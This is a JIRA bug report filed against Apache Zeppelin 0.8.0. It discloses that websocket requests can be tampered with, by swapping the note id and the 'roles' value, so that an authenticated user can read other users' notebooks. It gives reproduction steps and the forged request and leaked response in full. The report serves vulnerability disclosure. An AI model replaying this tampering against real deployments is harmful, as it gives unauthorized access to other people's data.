Akhil S Naik created ZEPPELIN-3906:
--------------------------------------
Summary: [security]Zeppelin Notebooks can be accessed by
unauthorized Users
Key: ZEPPELIN-3906
URL: https://issues.apache.org/jira/browse/ZEPPELIN-3906
Project: Zeppelin
Issue Type: Bug
Components: zeppelin-server
Affects Versions: 0.8.0
Environment: Easily reproducible in 0.8 zeppelin version with Simple
web socket client google extension
Reporter: Akhil S Naik
Attachments: Screen Shot 2018-12-13 at 9.58.21 AM.png
Zeppelin Notebook Role Access can be easily Bypassed and we can access Others
notebook
The exploit is achieved using web sockets, as Zeppelin’s web sockets fails to
validate if the active session of the user’s role, making the request, is
allowed to access another user’s note/data. The Zeppelin web socket requests
can be intercepted, by a malicious authenticated user, and the role value
modified enabling access to the other user’s jobs/results.
Reproduction Steps:
The following is required to reproduce this finding:
1. Authentication to the Zeppelin service, using user1, as a valid
"ticket” value is required by the web socket request.
(assume i logged in as akhil/akhil as basic authentication method of zeppelin)
2) open 'Simple Web Socket Client' - Chrome extension ( or use any interceptor
tool like burp)
3) open a Random notebook . we can see Zeeplin-web client will be sending
request
{code:java}
{"op":"GET_NOTE","data":{"id":"2DWPTEZCW"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[admin]"}
{code}
4) modify the above request > add a noteID which role admin doesnt have access,
edit the role to
{code:java}
{"op":"GET_NOTE","data":{"id":"2DZETETMP"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[akhil]"}
{code}
5) see the response from web scoket :
{code:java}
{"op":"GET_NOTE","data":{"id":"2DZETETMP"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[akhil]"}
{"op":"NOTE","data":{"note":{"paragraphs":[{"text":"whoami","user":"akhil","dateUpdated":"2018-12-12T03:27:52+0000","config":{"colWidth":12.0,"enabled":true,"results":{},"editorSetting":{"editOnDblClick":false,"language":"sh"},"editorMode":"ace/mode/sh"},"settings":{"params":{},"forms":{}},"results":{"code":"SUCCESS","msg":[{"type":"TEXT","data":"zeppelin\n"}]},"apps":[],"jobName":"paragraph_1544585263373_-927336176","id":"20181212-032743_583387567","dateCreated":"2018-12-12T03:27:43+0000","dateStarted":"2018-12-12T03:27:52+0000","dateFinished":"2018-12-12T03:27:53+0000","status":"FINISHED","progressUpdateIntervalMs":500},{"user":"akhil","config":{},"settings":{"params":{},"forms":{}},"apps":[],"jobName":"paragraph_1544585272646_-198606435","id":"20181212-032752_1799562836","dateCreated":"2018-12-12T03:27:52+0000","status":"READY","progressUpdateIntervalMs":500}],"name":"Akhil
Note","id":"2DZETETMP","angularObjects":{"2CHS8UYQQ:shared_process":[],"2CK8A9MEG:shared_process":[],"2CKAY1A8Y:shared_process":[],"2CKEKWY8Z:shared_process":[]},"config":{"isZeppelinNotebookCronEnable":false},"info":{}}},"ticket":"anonymous","principal":"anonymous","roles":""}
{code}
we will get whole details of notebook even though the JSESSIONID and ticket is
authenticated against admin and admin doesnt have access to NOTEBOOK : 2DZETETMP
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
